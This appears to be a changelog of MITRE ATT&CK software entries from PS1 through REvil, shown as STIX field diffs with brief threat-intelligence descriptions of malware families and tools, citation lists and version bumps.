| [PS1](https://attack.mitre.org/software/S0613) is a loader that was used to deploy 64-bit backdoors in the [CostaRicto](https://attack.mitre.org/groups/G0132) campaign.(Citation: BlackBerry CostaRicto November 2020) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-15 12:58:20.120000+00:00 | 2022-10-05 16:04:51.193000+00:00 |
| x_mitre_version | 1.0 | 1.1 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_aliases | PS1 |
| Description |
|---|
| [Penquin](https://attack.mitre.org/software/S0587) is a remote access trojan (RAT) with multiple versions used by [Turla](https://attack.mitre.org/groups/G0010) to target Linux systems since at least 2014.(Citation: Kaspersky Turla Penquin December 2014)(Citation: Leonardo Turla Penquin May 2020) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-04-09 17:35:29.546000+00:00 | 2022-10-20 04:12:29.037000+00:00 |
| external_references[4]['url'] | https://www.leonardocompany.com/documents/20142/10868623/Malware+Technical+Insight+_Turla+%E2%80%9CPenquin_x64%E2%80%9D.pdf | https://www.leonardo.com/documents/20142/10868623/Malware+Technical+Insight+_Turla+%E2%80%9CPenquin_x64%E2%80%9D.pdf |
| x_mitre_version | 1.0 | 1.1 |
| Description |
|---|
| [Pillowmint](https://attack.mitre.org/software/S0517) is a point-of-sale malware used by [FIN7](https://attack.mitre.org/groups/G0046) designed to capture credit card information.(Citation: Trustwave Pillowmint June 2020) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-10-06 17:25:07.301000+00:00 | 2022-07-29 19:50:27.063000+00:00 |
| x_mitre_version | 1.0 | 1.1 |
| Description |
|---|
| [Ping](https://attack.mitre.org/software/S0097) is an operating system utility commonly used to troubleshoot and verify network connections. (Citation: TechNet Ping) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_platforms | ['Linux', 'Windows', 'macOS'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2018-10-17 00:14:20.652000+00:00 | 2022-10-13 18:56:52.195000+00:00 |
| x_mitre_version | 1.0 | 1.2 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_aliases | ping.exe |
| Old Description | New Description |
|---|---|
| [PlugX](https://attack.mitre.org/software/S0013) is a remote access tool (RAT) that uses modular plugins. It has been used by multiple threat groups. (Citation: Lastline PlugX Analysis) (Citation: FireEye Clandestine Fox Part 2) (Citation: New DragonOK) (Citation: Dell TG-3390) | [PlugX](https://attack.mitre.org/software/S0013) is a remote access tool (RAT) with modular plugins that has been used by multiple threat groups.(Citation: Lastline PlugX Analysis)(Citation: FireEye Clandestine Fox Part 2)(Citation: New DragonOK)(Citation: Dell TG-3390) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | http://labs.lastline.com/an-analysis-of-plugx | |
| external_references | https://www.fireeye.com/blog/threat-research/2014/06/clandestine-fox-part-deux.html |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-06-20 21:43:42.587000+00:00 | 2022-04-15 16:30:28.192000+00:00 |
| description | [PlugX](https://attack.mitre.org/software/S0013) is a remote access tool (RAT) that uses modular plugins. It has been used by multiple threat groups. (Citation: Lastline PlugX Analysis) (Citation: FireEye Clandestine Fox Part 2) (Citation: New DragonOK) (Citation: Dell TG-3390) | [PlugX](https://attack.mitre.org/software/S0013) is a remote access tool (RAT) with modular plugins that has been used by multiple threat groups.(Citation: Lastline PlugX Analysis)(Citation: FireEye Clandestine Fox Part 2)(Citation: New DragonOK)(Citation: Dell TG-3390) |
| external_references[1]['source_name'] | PlugX | DestroyRAT |
| external_references[1]['description'] | (Citation: Lastline PlugX Analysis) (Citation: FireEye Clandestine Fox Part 2)(Citation: CIRCL PlugX March 2013) | (Citation: CIRCL PlugX March 2013) |
| external_references[2]['source_name'] | DestroyRAT | Kaba |
| external_references[2]['description'] | (Citation: CIRCL PlugX March 2013) | (Citation: FireEye Clandestine Fox Part 2) |
| external_references[3]['source_name'] | Sogu | PlugX |
| external_references[4]['source_name'] | Kaba | Korplug |
| external_references[4]['description'] | (Citation: FireEye Clandestine Fox Part 2) | (Citation: Lastline PlugX Analysis)(Citation: CIRCL PlugX March 2013) |
| external_references[5]['source_name'] | Korplug | Sogu |
| external_references[5]['description'] | (Citation: Lastline PlugX Analysis)(Citation: CIRCL PlugX March 2013) | (Citation: Lastline PlugX Analysis)(Citation: FireEye Clandestine Fox Part 2)(Citation: CIRCL PlugX March 2013) |
| external_references[6]['source_name'] | Lastline PlugX Analysis | Thoper |
| external_references[6]['description'] | Vasilenko, R. (2013, December 17). An Analysis of PlugX Malware. Retrieved November 24, 2015. | (Citation: Novetta-Axiom) |
| external_references[7]['source_name'] | FireEye Clandestine Fox Part 2 | TVT |
| external_references[7]['description'] | Scott, M.. (2014, June 10). Clandestine Fox, Part Deux. Retrieved January 14, 2016. | (Citation: Novetta-Axiom) |
| external_references[8]['source_name'] | New DragonOK | CIRCL PlugX March 2013 |
| external_references[8]['description'] | Miller-Osborn, J., Grunzweig, J.. (2015, April). Unit 42 Identifies New DragonOK Backdoor Malware Deployed Against Japanese Targets. Retrieved November 4, 2015. | Computer Incident Response Center Luxembourg. (2013, March 29). Analysis of a PlugX variant. Retrieved November 5, 2018. |
| external_references[8]['url'] | http://researchcenter.paloaltonetworks.com/2015/04/unit-42-identifies-new-dragonok-backdoor-malware-deployed-against-japanese-targets/ | http://circl.lu/assets/files/tr-12/tr-12-circl-plugx-analysis-v1.pdf |
| external_references[10]['source_name'] | CIRCL PlugX March 2013 | New DragonOK |
| external_references[10]['description'] | Computer Incident Response Center Luxembourg. (2013, March 29). Analysis of a PlugX variant. Retrieved November 5, 2018. | Miller-Osborn, J., Grunzweig, J.. (2015, April). Unit 42 Identifies New DragonOK Backdoor Malware Deployed Against Japanese Targets. Retrieved November 4, 2015. |
| external_references[10]['url'] | http://circl.lu/assets/files/tr-12/tr-12-circl-plugx-analysis-v1.pdf | http://researchcenter.paloaltonetworks.com/2015/04/unit-42-identifies-new-dragonok-backdoor-malware-deployed-against-japanese-targets/ |
| x_mitre_version | 2.1 | 3.0 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'Novetta-Axiom', 'description': 'Novetta. (n.d.). Operation SMN: Axiom Threat Actor Group Report. Retrieved November 12, 2014.', 'url': 'http://www.novetta.com/wp-content/uploads/2014/11/Executive_Summary-Final_1.pdf'} | |
| external_references | {'source_name': 'FireEye Clandestine Fox Part 2', 'description': 'Scott, M.. (2014, June 10). Clandestine Fox, Part Deux. Retrieved January 14, 2016.', 'url': 'https://www.fireeye.com/blog/threat-research/2014/06/clandestine-fox-part-deux.html'} | |
| external_references | {'source_name': 'Lastline PlugX Analysis', 'description': 'Vasilenko, R. (2013, December 17). An Analysis of PlugX Malware. Retrieved November 24, 2015.', 'url': 'http://labs.lastline.com/an-analysis-of-plugx'} | |
| x_mitre_aliases | Thoper | |
| x_mitre_aliases | TVT |
| Description |
|---|
| [PoetRAT](https://attack.mitre.org/software/S0428) is a remote access trojan (RAT) that was first identified in April 2020. [PoetRAT](https://attack.mitre.org/software/S0428) has been used in multiple campaigns against the private and public sectors in Azerbaijan, including ICS and SCADA systems in the energy sector. The STIBNITE activity group has been observed using the malware. [PoetRAT](https://attack.mitre.org/software/S0428) derived its name from references in the code to poet William Shakespeare. (Citation: Talos PoetRAT April 2020)(Citation: Talos PoetRAT October 2020)(Citation: Dragos Threat Report 2020) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-04-24 21:20:30.634000+00:00 | 2022-04-19 01:41:29.396000+00:00 |
| external_references[1]['source_name'] | Talos PoetRAT April 2020 | Dragos Threat Report 2020 |
| external_references[1]['description'] | Mercer, W, et al. (2020, April 16). PoetRAT: Python RAT uses COVID-19 lures to target Azerbaijan public and private sectors. Retrieved April 27, 2020. | Dragos. (n.d.). ICS Cybersecurity Year in Review 2020. Retrieved February 25, 2021. |
| external_references[1]['url'] | https://blog.talosintelligence.com/2020/04/poetrat-covid-19-lures.html | https://hub.dragos.com/hubfs/Year-in-Review/Dragos_2020_ICS_Cybersecurity_Year_In_Review.pdf?hsCtaTracking=159c0fc3-92d8-425d-aeb8-12824f2297e8%7Cf163726d-579b-4996-9a04-44e5a124d770 |
| external_references[2]['source_name'] | Talos PoetRAT October 2020 | Talos PoetRAT April 2020 |
| external_references[2]['description'] | Mercer, W. Rascagneres, P. Ventura, V. (2020, October 6). PoetRAT: Malware targeting public and private sector in Azerbaijan evolves . Retrieved April 9, 2021. | Mercer, W, et al. (2020, April 16). PoetRAT: Python RAT uses COVID-19 lures to target Azerbaijan public and private sectors. Retrieved April 27, 2020. |
| external_references[2]['url'] | https://blog.talosintelligence.com/2020/10/poetrat-update.html | https://blog.talosintelligence.com/2020/04/poetrat-covid-19-lures.html |
| external_references[3]['source_name'] | Dragos Threat Report 2020 | Talos PoetRAT October 2020 |
| external_references[3]['description'] | Dragos. (n.d.). ICS Cybersecurity Year in Review 2020. Retrieved February 25, 2021. | Mercer, W. Rascagneres, P. Ventura, V. (2020, October 6). PoetRAT: Malware targeting public and private sector in Azerbaijan evolves . Retrieved April 9, 2021. |
| external_references[3]['url'] | https://hub.dragos.com/hubfs/Year-in-Review/Dragos_2020_ICS_Cybersecurity_Year_In_Review.pdf?hsCtaTracking=159c0fc3-92d8-425d-aeb8-12824f2297e8%7Cf163726d-579b-4996-9a04-44e5a124d770 | https://blog.talosintelligence.com/2020/10/poetrat-update.html |
| x_mitre_version | 2.0 | 2.1 |
| Old Description | New Description |
|---|---|
| [PoisonIvy](https://attack.mitre.org/software/S0012) is a popular remote access tool (RAT) that has been used by many groups. (Citation: FireEye Poison Ivy) (Citation: Symantec Elderwood Sept 2012) (Citation: Symantec Darkmoon Aug 2005) | [PoisonIvy](https://attack.mitre.org/software/S0012) is a popular remote access tool (RAT) that has been used by many groups.(Citation: FireEye Poison Ivy)(Citation: Symantec Elderwood Sept 2012)(Citation: Symantec Darkmoon Aug 2005) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-poison-ivy.pdf |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-16 01:58:17.100000+00:00 | 2022-09-30 21:02:39.862000+00:00 |
| description | [PoisonIvy](https://attack.mitre.org/software/S0012) is a popular remote access tool (RAT) that has been used by many groups. (Citation: FireEye Poison Ivy) (Citation: Symantec Elderwood Sept 2012) (Citation: Symantec Darkmoon Aug 2005) | [PoisonIvy](https://attack.mitre.org/software/S0012) is a popular remote access tool (RAT) that has been used by many groups.(Citation: FireEye Poison Ivy)(Citation: Symantec Elderwood Sept 2012)(Citation: Symantec Darkmoon Aug 2005) |
| external_references[1]['source_name'] | PoisonIvy | Poison Ivy |
| external_references[2]['source_name'] | Poison Ivy | PoisonIvy |
| external_references[2]['description'] | (Citation: FireEye Poison Ivy) (Citation: Symantec Darkmoon Sept 2014) | (Citation: FireEye Poison Ivy)(Citation: Symantec Darkmoon Sept 2014) |
| external_references[3]['source_name'] | Darkmoon | Breut |
| external_references[3]['description'] | (Citation: Symantec Darkmoon Sept 2014) | (Citation: Novetta-Axiom) |
| external_references[4]['source_name'] | FireEye Poison Ivy | Darkmoon |
| external_references[4]['description'] | FireEye. (2014). POISON IVY: Assessing Damage and Extracting Intelligence. Retrieved November 12, 2014. | (Citation: Symantec Darkmoon Sept 2014) |
| external_references[5]['source_name'] | Symantec Elderwood Sept 2012 | FireEye Poison Ivy |
| external_references[5]['description'] | O'Gorman, G., and McDonald, G.. (2012, September 6). The Elderwood Project. Retrieved February 15, 2018. | FireEye. (2014). POISON IVY: Assessing Damage and Extracting Intelligence. Retrieved November 12, 2014. |
| external_references[5]['url'] | https://web.archive.org/web/20190717233006/http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-elderwood-project.pdf | https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-poison-ivy.pdf |
| external_references[7]['source_name'] | Symantec Darkmoon Sept 2014 | Novetta-Axiom |
| external_references[7]['description'] | Payet, L. (2014, September 19). Life on Mars: How attackers took advantage of hope for alien existance in new Darkmoon campaign. Retrieved September 13, 2018. | Novetta. (n.d.). Operation SMN: Axiom Threat Actor Group Report. Retrieved November 12, 2014. |
| external_references[7]['url'] | https://www.symantec.com/connect/blogs/life-mars-how-attackers-took-advantage-hope-alien-existance-new-darkmoon-campaign | http://www.novetta.com/wp-content/uploads/2014/11/Executive_Summary-Final_1.pdf |
| x_mitre_version | 1.3 | 2.1 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'Symantec Elderwood Sept 2012', 'description': "O'Gorman, G., and McDonald, G.. (2012, September 6). The Elderwood Project. Retrieved February 15, 2018.", 'url': 'https://web.archive.org/web/20190717233006/http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-elderwood-project.pdf'} | |
| external_references | {'source_name': 'Symantec Darkmoon Sept 2014', 'description': 'Payet, L. (2014, September 19). Life on Mars: How attackers took advantage of hope for alien existance in new Darkmoon campaign. Retrieved September 13, 2018.', 'url': 'https://www.symantec.com/connect/blogs/life-mars-how-attackers-took-advantage-hope-alien-existance-new-darkmoon-campaign'} | |
| x_mitre_aliases | Breut |
| Description |
|---|
| [PoshC2](https://attack.mitre.org/software/S0378) is an open source remote administration and post-exploitation framework that is publicly available on GitHub. The server-side components of the tool are primarily written in Python, while the implants are written in [PowerShell](https://attack.mitre.org/techniques/T1059/001). Although [PoshC2](https://attack.mitre.org/software/S0378) is primarily focused on Windows implantation, it does contain a basic Python dropper for Linux/macOS.(Citation: GitHub PoshC2) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-02-09 13:59:23.129000+00:00 | 2022-06-03 17:45:36.186000+00:00 |
| x_mitre_version | 1.2 | 1.3 |
| Description |
|---|
| [PowerSploit](https://attack.mitre.org/software/S0194) is an open source, offensive security framework comprised of [PowerShell](https://attack.mitre.org/techniques/T1059/001) modules and scripts that perform a wide range of tasks related to penetration testing such as code execution, persistence, bypassing anti-virus, recon, and exfiltration. (Citation: GitHub PowerSploit May 2012) (Citation: PowerShellMagazine PowerSploit July 2014) (Citation: PowerSploit Documentation) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-05 01:24:41.497000+00:00 | 2022-09-27 18:18:15.392000+00:00 |
| external_references[1]['source_name'] | GitHub PowerSploit May 2012 | PowerShellMagazine PowerSploit July 2014 |
| external_references[1]['description'] | PowerShellMafia. (2012, May 26). PowerSploit - A PowerShell Post-Exploitation Framework. Retrieved February 6, 2018. | Graeber, M. (2014, July 8). PowerSploit. Retrieved February 6, 2018. |
| external_references[1]['url'] | https://github.com/PowerShellMafia/PowerSploit | http://www.powershellmagazine.com/2014/07/08/powersploit/ |
| external_references[2]['source_name'] | PowerShellMagazine PowerSploit July 2014 | GitHub PowerSploit May 2012 |
| external_references[2]['description'] | Graeber, M. (2014, July 8). PowerSploit. Retrieved February 6, 2018. | PowerShellMafia. (2012, May 26). PowerSploit - A PowerShell Post-Exploitation Framework. Retrieved February 6, 2018. |
| external_references[2]['url'] | http://www.powershellmagazine.com/2014/07/08/powersploit/ | https://github.com/PowerShellMafia/PowerSploit |
| x_mitre_version | 1.4 | 1.5 |
| Description |
|---|
| [Prikormka](https://attack.mitre.org/software/S0113) is a malware family used in a campaign known as Operation Groundbait. It has predominantly been observed in Ukraine and was used as early as 2008. (Citation: ESET Operation Groundbait) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-30 02:39:23.582000+00:00 | 2022-04-19 01:42:59.312000+00:00 |
| x_mitre_version | 1.2 | 1.3 |
| Old Description | New Description |
|---|---|
| [PsExec](https://attack.mitre.org/software/S0029) is a free Microsoft tool that can be used to execute a program on another computer. It is used by IT administrators and attackers. (Citation: Russinovich Sysinternals) (Citation: SANS PsExec) | [PsExec](https://attack.mitre.org/software/S0029) is a free Microsoft tool that can be used to execute a program on another computer. It is used by IT administrators and attackers.(Citation: Russinovich Sysinternals)(Citation: SANS PsExec) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 3.0.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-06-24 13:47:24.660000+00:00 | 2022-11-01 18:29:13.666000+00:00 |
| description | [PsExec](https://attack.mitre.org/software/S0029) is a free Microsoft tool that can be used to execute a program on another computer. It is used by IT administrators and attackers. (Citation: Russinovich Sysinternals) (Citation: SANS PsExec) | [PsExec](https://attack.mitre.org/software/S0029) is a free Microsoft tool that can be used to execute a program on another computer. It is used by IT administrators and attackers.(Citation: Russinovich Sysinternals)(Citation: SANS PsExec) |
| external_references[1]['source_name'] | Russinovich Sysinternals | SANS PsExec |
| external_references[1]['description'] | Russinovich, M. (2014, May 2). Windows Sysinternals PsExec v2.11. Retrieved May 13, 2015. | Pilkington, M. (2012, December 17). Protecting Privileged Domain Accounts: PsExec Deep-Dive. Retrieved August 17, 2016. |
| external_references[1]['url'] | https://technet.microsoft.com/en-us/sysinternals/bb897553.aspx | https://www.sans.org/blog/protecting-privileged-domain-accounts-psexec-deep-dive/ |
| external_references[2]['source_name'] | SANS PsExec | Russinovich Sysinternals |
| external_references[2]['description'] | Pilkington, M.. (2012, December 17). Protecting Privileged Domain Accounts: PsExec Deep-Dive. Retrieved August 17, 2016. | Russinovich, M. (2014, May 2). Windows Sysinternals PsExec v2.11. Retrieved May 13, 2015. |
| external_references[2]['url'] | https://digital-forensics.sans.org/blog/2012/12/17/protecting-privileged-domain-accounts-psexec-deep-dive | https://technet.microsoft.com/en-us/sysinternals/bb897553.aspx |
| x_mitre_version | 1.2 | 1.3 |
| Description |
|---|
| [Pteranodon](https://attack.mitre.org/software/S0147) is a custom backdoor used by [Gamaredon Group](https://attack.mitre.org/groups/G0047). (Citation: Palo Alto Gamaredon Feb 2017) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/ |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-06-22 17:54:15.287000+00:00 | 2022-08-23 15:25:11.145000+00:00 |
| external_references[1]['source_name'] | Palo Alto Gamaredon Feb 2017 | Pterodo |
| external_references[1]['description'] | Kasza, A. and Reichel, D. (2017, February 27). The Gamaredon Group Toolset Evolution. Retrieved March 1, 2017. | (Citation: Symantec Shuckworm January 2022)(Citation: Secureworks IRON TILDEN Profile) |
| x_mitre_version | 1.1 | 2.1 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'Palo Alto Gamaredon Feb 2017', 'description': 'Kasza, A. and Reichel, D. (2017, February 27). The Gamaredon Group Toolset Evolution. Retrieved March 1, 2017.', 'url': 'https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/'} | |
| external_references | {'source_name': 'Secureworks IRON TILDEN Profile', 'description': 'Secureworks CTU. (n.d.). IRON TILDEN. Retrieved February 24, 2022.', 'url': 'https://www.secureworks.com/research/threat-profiles/iron-tilden'} | |
| external_references | {'source_name': 'Symantec Shuckworm January 2022', 'description': 'Symantec. (2022, January 31). Shuckworm Continues Cyber-Espionage Attacks Against Ukraine. Retrieved February 17, 2022.', 'url': 'https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/shuckworm-gamaredon-espionage-ukraine'} | |
| x_mitre_aliases | Pterodo |
| Old Description | New Description |
|---|---|
| [QuasarRAT](https://attack.mitre.org/software/S0262) is an open-source, remote access tool that is publicly available on GitHub. [QuasarRAT](https://attack.mitre.org/software/S0262) is developed in the C# language. (Citation: GitHub QuasarRAT) (Citation: Volexity Patchwork June 2018) | [QuasarRAT](https://attack.mitre.org/software/S0262) is an open-source, remote access tool that has been publicly available on GitHub since at least 2014. [QuasarRAT](https://attack.mitre.org/software/S0262) is developed in the C# language.(Citation: GitHub QuasarRAT)(Citation: Volexity Patchwork June 2018) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_contributors | ['Kyaw Pyiyt Htet, @KyawPyiytHtet'] | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-06-22 13:57:03.434000+00:00 | 2022-08-02 15:36:30.238000+00:00 |
| description | [QuasarRAT](https://attack.mitre.org/software/S0262) is an open-source, remote access tool that is publicly available on GitHub. [QuasarRAT](https://attack.mitre.org/software/S0262) is developed in the C# language. (Citation: GitHub QuasarRAT) (Citation: Volexity Patchwork June 2018) | [QuasarRAT](https://attack.mitre.org/software/S0262) is an open-source, remote access tool that has been publicly available on GitHub since at least 2014. [QuasarRAT](https://attack.mitre.org/software/S0262) is developed in the C# language.(Citation: GitHub QuasarRAT)(Citation: Volexity Patchwork June 2018) |
| external_references[3]['source_name'] | GitHub QuasarRAT | Securelist APT10 March 2021 |
| external_references[3]['description'] | MaxXor. (n.d.). QuasarRAT. Retrieved July 10, 2018. | GREAT. (2021, March 30). APT10: sophisticated multi-layered loader Ecipekac discovered in A41APT campaign. Retrieved June 17, 2021. |
| external_references[3]['url'] | https://github.com/quasar/QuasarRAT | https://securelist.com/apt10-sophisticated-multi-layered-loader-ecipekac-discovered-in-a41apt-campaign/101519/ |
| external_references[4]['source_name'] | Volexity Patchwork June 2018 | TrendMicro Patchwork Dec 2017 |
| external_references[4]['description'] | Meltzer, M, et al. (2018, June 07). Patchwork APT Group Targets US Think Tanks. Retrieved July 16, 2018. | Lunghi, D., et al. (2017, December). Untangling the Patchwork Cyberespionage Group. Retrieved July 10, 2018. |
| external_references[4]['url'] | https://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/ | https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf |
| external_references[5]['source_name'] | TrendMicro Patchwork Dec 2017 | GitHub QuasarRAT |
| external_references[5]['description'] | Lunghi, D., et al. (2017, December). Untangling the Patchwork Cyberespionage Group. Retrieved July 10, 2018. | MaxXor. (n.d.). QuasarRAT. Retrieved July 10, 2018. |
| external_references[5]['url'] | https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf | https://github.com/quasar/QuasarRAT |
| external_references[6]['source_name'] | Securelist APT10 March 2021 | Volexity Patchwork June 2018 |
| external_references[6]['description'] | GREAT. (2021, March 30). APT10: sophisticated multi-layered loader Ecipekac discovered in A41APT campaign. Retrieved June 17, 2021. | Meltzer, M, et al. (2018, June 07). Patchwork APT Group Targets US Think Tanks. Retrieved July 16, 2018. |
| external_references[6]['url'] | https://securelist.com/apt10-sophisticated-multi-layered-loader-ecipekac-discovered-in-a41apt-campaign/101519/ | https://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/ |
| x_mitre_version | 1.2 | 2.0 |
| Old Description | New Description |
|---|---|
| [REvil](https://attack.mitre.org/software/S0496) is a ransomware family that has been linked to the [GOLD SOUTHFIELD](https://attack.mitre.org/groups/G0115) group and operated as ransomware-as-a-service (RaaS) since at least April 2019. [REvil](https://attack.mitre.org/software/S0496) is highly configurable and shares code similarities with the GandCrab RaaS.(Citation: Secureworks REvil September 2019)(Citation: Intel 471 REvil March 2020)(Citation: Group IB Ransomware May 2020) | [REvil](https://attack.mitre.org/software/S0496) is a ransomware family that has been linked to the [GOLD SOUTHFIELD](https://attack.mitre.org/groups/G0115) group and operated as ransomware-as-a-service (RaaS) since at least April 2019. [REvil](https://attack.mitre.org/software/S0496), which as been used against organizations in the manufacturing, transportation, and electric sectors, is highly configurable and shares code similarities with the GandCrab RaaS.(Citation: Secureworks REvil September 2019)(Citation: Intel 471 REvil March 2020)(Citation: Group IB Ransomware May 2020) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack', 'ics-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-08-18 19:38:51.122000+00:00 | 2022-05-24 21:09:01.019000+00:00 |
| description | [REvil](https://attack.mitre.org/software/S0496) is a ransomware family that has been linked to the [GOLD SOUTHFIELD](https://attack.mitre.org/groups/G0115) group and operated as ransomware-as-a-service (RaaS) since at least April 2019. [REvil](https://attack.mitre.org/software/S0496) is highly configurable and shares code similarities with the GandCrab RaaS.(Citation: Secureworks REvil September 2019)(Citation: Intel 471 REvil March 2020)(Citation: Group IB Ransomware May 2020) | [REvil](https://attack.mitre.org/software/S0496) is a ransomware family that has been linked to the [GOLD SOUTHFIELD](https://attack.mitre.org/groups/G0115) group and operated as ransomware-as-a-service (RaaS) since at least April 2019. [REvil](https://attack.mitre.org/software/S0496), which as been used against organizations in the manufacturing, transportation, and electric sectors, is highly configurable and shares code similarities with the GandCrab RaaS.(Citation: Secureworks REvil September 2019)(Citation: Intel 471 REvil March 2020)(Citation: Group IB Ransomware May 2020) |
| external_references[3]['source_name'] | Secureworks REvil September 2019 | Talos Sodinokibi April 2019 |
| external_references[3]['description'] | Counter Threat Unit Research Team. (2019, September 24). REvil/Sodinokibi Ransomware. Retrieved August 4, 2020. | Cadieux, P, et al (2019, April 30). Sodinokibi ransomware exploits WebLogic Server vulnerability. Retrieved August 4, 2020. |
| external_references[3]['url'] | https://www.secureworks.com/research/revil-sodinokibi-ransomware | https://blog.talosintelligence.com/2019/04/sodinokibi-ransomware-exploits-weblogic.html |
| external_references[4]['source_name'] | Intel 471 REvil March 2020 | Secureworks REvil September 2019 |
| external_references[4]['description'] | Intel 471 Malware Intelligence team. (2020, March 31). REvil Ransomware-as-a-Service – An analysis of a ransomware affiliate operation. Retrieved August 4, 2020. | Counter Threat Unit Research Team. (2019, September 24). REvil/Sodinokibi Ransomware. Retrieved August 4, 2020. |
| external_references[4]['url'] | https://intel471.com/blog/revil-ransomware-as-a-service-an-analysis-of-a-ransomware-affiliate-operation/ | https://www.secureworks.com/research/revil-sodinokibi-ransomware |
| external_references[5]['source_name'] | Group IB Ransomware May 2020 | Cylance Sodinokibi July 2019 |
| external_references[5]['description'] | Group IB. (2020, May). Ransomware Uncovered: Attackers’ Latest Methods. Retrieved August 5, 2020. | Cylance. (2019, July 3). hreat Spotlight: Sodinokibi Ransomware. Retrieved August 4, 2020. |
